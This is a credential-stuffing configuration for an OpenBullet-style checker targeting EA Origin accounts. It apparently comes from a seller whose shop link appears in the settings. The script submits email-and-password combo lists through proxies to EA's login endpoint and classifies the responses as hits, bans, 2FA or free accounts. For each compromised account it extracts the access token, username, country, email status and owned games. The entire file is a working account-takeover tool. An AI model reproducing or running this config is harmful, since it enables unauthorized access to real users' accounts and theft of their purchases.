[SETTINGS]
{
  "Name": "Origin",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-08-14T16:14:05.1870976+01:00",
  "AdditionalInfo": "https://sellix.io/RaReMoDz",
  "Author": "RaReMoDz#3662",
  "Version": "1.3.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#cid FUNCTION RandomString "?d?l?l?l?l?u?l?l?u?d?l?d?l?u?u?l?u?l?d?u?l?u?l?l?u?u?l?d?l?u?u?l" -> VAR "cid" 

#ua FUNCTION GetRandomUA -> VAR "ua" 

#Get_Login REQUEST GET "https://signin.ea.com/p/originX/login?execution=e138485230s1&initref=https%3A%2F%2Faccounts.ea.com%3A443%2Fconnect%2Fauth%3Fdisplay%3DoriginXWeb%252Flogin%26response_type%3Dcode%26release_type%3Dprod%26redirect_uri%3Dhttps%253A%252F%252Fwww.origin.com%252Fviews%252Flogin.html%26locale%3Dsv_SE%26client_id%3DORIGIN_SPA_ID" ReadResponseSource=FALSE 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Origin: https://signin.ea.com" 
  HEADER "Referer: https://signin.ea.com/p/originX/login?execution=e1121911523s1&initref=https%3A%2F%2Faccounts.ea.com%3A443%2Fconnect%2Fauth%3Fdisplay%3DoriginXWeb%252Flogin%26response_type%3Dcode%26release_type%3Dprod%26redirect_uri%3Dhttps%253A%252F%252Fwww.origin.com%252Fviews%252Flogin.html%26locale%3Den_US%26client_id%3DORIGIN_SPA_ID" 

#Post_Login REQUEST POST "<ADDRESS>" 
  CONTENT "email=<USER>&password=<PASS>&_eventId=submit&cid=<cid>&showAgeUp=true&googleCaptchaResponse=&thirdPartyCaptchaResponse=&_rememberMe=on&rememberMe=on" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: <ua>" 
  HEADER "Origin: https://signin.ea.com" 
  HEADER "Referer: https://signin.ea.com/p/originX/login?execution=e1121911523s1&initref=https%3A%2F%2Faccounts.ea.com%3A443%2Fconnect%2Fauth%3Fdisplay%3DoriginXWeb%252Flogin%26response_type%3Dcode%26release_type%3Dprod%26redirect_uri%3Dhttps%253A%252F%252Fwww.origin.com%252Fviews%252Flogin.html%26locale%3Den_US%26client_id%3DORIGIN_SPA_ID" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "loginSource " 
  KEYCHAIN Failure AND 
    KEY "<SOURCE>" DoesNotContain "var originId" 
    KEY "Dina uppgifter är fel eller har slutat gälla. Försök igen eller återställ ditt lösenord" 
  KEYCHAIN Ban OR 
    KEY "Tyvärr har vi tekniska problem för tillfället. Försök igen senare." 
    KEY "FEL för webbplatsägare:" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Slutför skapandet av ditt EA-konto" 
    KEY "/p/web2/twoPhaseRegister?" 
    KEY "Ditt konto har avaktiverats" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Inloggningsbekräftelse" 
    KEY "Bekräfta din identitet" 

#fid PARSE "<SOURCE>" LR "fid=" "\";" -> VAR "fid" 

#Get_Token REQUEST GET "https://accounts.ea.com/connect/auth?display=originXWeb%2Flogin&response_type=code&release_type=prod&redirect_uri=https%3A%2F%2Fwww.origin.com%2Fviews%2Flogin.html&locale=en_US&client_id=ORIGIN_SPA_ID&fid=<fid>" ReadResponseSource=FALSE 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Referer: https://signin.ea.com/" 

#Auth REQUEST GET "https://accounts.ea.com/connect/auth?client_id=ORIGIN_JS_SDK&response_type=token&redirect_uri=nucleus:rest&prompt=none&release_type=prod" 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.origin.com" 
  HEADER "Referer: https://www.origin.com/" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<SOURCE>" DoesNotContain "access_token" 

#token PARSE "<SOURCE>" JSON "access_token" CreateEmpty=FALSE -> VAR "token" 

#Get_identity REQUEST GET "https://gateway.ea.com/proxy/identity/pids/me" 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Authorization: Bearer <token>" 
  HEADER "Host: gateway.ea.com" 
  HEADER "Referer: https://www.origin.com/" 

#pidId PARSE "<SOURCE>" JSON "pidId" -> VAR "pidId" 

#get_emailStatus PARSE "<SOURCE>" JSON "emailStatus" -> VAR "get_emailStatus" 

#get_country PARSE "<SOURCE>" JSON "country" -> VAR "get_country" 

#Get_Username REQUEST GET "https://api4.origin.com/atom/users?userIds=<pidId>" 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "AuthToken: <token>" 
  HEADER "Origin: https://www.origin.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.origin.com/" 

#Get_Username PARSE "<SOURCE>" LR "<EAID>" "</EAID>" -> VAR "Get_Username" 

#Game_Info REQUEST GET "https://api1.origin.com/ecommerce2/consolidatedentitlements/<pidId>?machine_hash=1 " 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "AuthToken: <token>" 
  HEADER "Host: api1.origin.com" 
  HEADER "Origin: https://www.origin.com" 
  HEADER "Referer: https://www.origin.com/" 

KEYCHECK 
  KEYCHAIN Custom "FREE" AND 
    KEY "<SOURCE>" DoesNotContain "offerPath" 
    KEY "serverResponseDate" 
  KEYCHAIN Success OR 
    KEY "offerPath" 

#Get_Games PARSE "<SOURCE>" LR "<offerPath>/" "</offerPath" Recursive=TRUE -> VAR "Get_Games" 

#Seperate_games PARSE "<Get_Games>" LR "/" "," Recursive=TRUE -> VAR "Seperate_games" 

#Replace_comma FUNCTION Replace "," " |" "<Seperate_games>" -> VAR "Replace_comma" 

#Finished_Games FUNCTION Replace "/" " = " "<Replace_comma>" -> VAR "Finished_Games" 

#Username FUNCTION Constant "<Get_Username>" -> CAP "Username" 

#Country FUNCTION Constant "<get_country>" -> CAP "Country" 

#EmailStatus FUNCTION Translate 
  KEY "UNKNOWN" VALUE "Not Verified" 
  KEY "VERIFIED" VALUE "Verified" 
  "<get_emailStatus>" -> CAP "EmailStatus" 

#Gamese FUNCTION Constant "<Finished_Games>" -> VAR "Gamese" 

#Games2 FUNCTION Replace "[]" "<Get_Games>" "<Gamese>" -> CAP "Games " 

